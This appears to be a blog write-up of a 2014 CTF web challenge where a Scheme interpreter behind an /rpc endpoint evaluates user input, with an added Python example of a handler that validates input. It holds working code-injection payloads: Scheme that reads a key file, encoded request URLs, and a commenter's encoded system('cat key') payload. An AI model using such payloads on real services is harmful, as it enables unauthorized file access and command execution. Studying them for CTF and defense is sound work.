A disturbing lack of taste. Just another WordPress site

2 Mar 14

Boston Key Party CTF 2014 – Web200 Writeup

The task gave us a link to a site containing some JavaScript base64 code and some jQuery. A broken image is displayed, and once you click on it the browser makes an AJAX request to /rpc(base64_encoded_stuff). Decoding the part of the request after '/rpc' showed that it is a number, which the server then adds to '5'. After a bit of testing we found out that we were dealing with the functional programming language Scheme (as hinted by the title of the challenge), by submitting special characters like '#' and googling the errors that popped up. After reading the reference and the manual we tried some code like:

( print "hi") or (* 8 8)

and they worked. So we can now take the flag just by opening the 'key' file:

( (call-with-input-file "./key"
  (lambda (input-port)
    (let loop ((x (read-char input-port)))
      (if (not (eof-object? x))
          (begin
            (display x)
            (loop (read-char input-port))))))))

http://54.218.22.41:4878/rpcKCAoY2FsbC13aXRoLWlucHV0LWZpbGUgIi4va2V5IgogIChsYW1iZGEgKGlucHV0LXBvcnQpCiAgICAobGV0IGxvb3AgKCh4IChyZWFkLWNoYXIgaW5wdXQtcG9ydCkpKQogICAgICAoaWYgKG5vdCAoZW9mLW9iamVjdD8geCkpCiAgICAgICAgICAoYmVnaW4KICAgICAgICAgICAgKGRpc3BsYXkgeCkKICAgICAgICAgICAgKGxvb3AgKHJlYWQtY2hhciBpbnB1dC1wb3J0KSkpKSkpKSk=

flag{))))))))))))))))))))))))))))))))))))}

Razor4x
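
For the defensive side of this bug, here is an added example (not part of the original write-up and not the challenge server's code) of an /rpc handler that treats the decoded argument strictly as data instead of handing it to an interpreter. The size limit, the integer pattern, the uniform error reply and the helper names are assumptions made for illustration.

```python
import base64
import re

RPC_PREFIX = "/rpc"          # per the write-up: base64 text follows "/rpc" directly
ADDEND = 5                   # per the write-up: the server adds 5 to the number
MAX_B64_LEN = 24             # assumption: room for a sign plus 15 digits, encoded
INT_LITERAL = re.compile(r"-?[0-9]{1,15}")
GENERIC_ERROR = (400, "invalid argument")   # same reply for every failure, so
                                            # errors do not reveal the backend


def make_path(text: str) -> str:
    """Build a request path the way the page's client does (demo helper)."""
    return RPC_PREFIX + base64.b64encode(text.encode("ascii")).decode("ascii")


def handle_rpc(path: str) -> tuple:
    """Decode, validate, then add. Returns (status, body)."""
    if not path.startswith(RPC_PREFIX):
        return GENERIC_ERROR
    encoded = path[len(RPC_PREFIX):]
    if not encoded or len(encoded) > MAX_B64_LEN:
        return GENERIC_ERROR
    try:
        # validate=True rejects characters outside the base64 alphabet.
        text = base64.b64decode(encoded, validate=True).decode("ascii")
    except ValueError:
        # Covers binascii.Error, UnicodeDecodeError and non-ASCII input.
        return GENERIC_ERROR
    # fullmatch, not match/search: "37\n" or "37 (* 8 8)" must not pass.
    if not INT_LITERAL.fullmatch(text):
        return GENERIC_ERROR
    # int() parses a literal; no interpreter ever sees the request text.
    return (200, str(int(text) + ADDEND))


if __name__ == "__main__":
    # Constructed requests; the two expressions are the ones quoted above.
    for arg in ["37", "-5", '( print "hi")', "(* 8 8)", "37\n", ""]:
        print(repr(arg), "->", handle_rpc(make_path(arg)))
```
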

Comments (1)
  1. Hi, very nice write-up. My team failed to use the AJAX method, so we solved it by using PHP:

    http://54.218.22.41:4878/

    => http://54.218.22.41:4878/rpcPD9QSFAgKHN5c3RlbSAiY2F0IGtleSIpOz8+

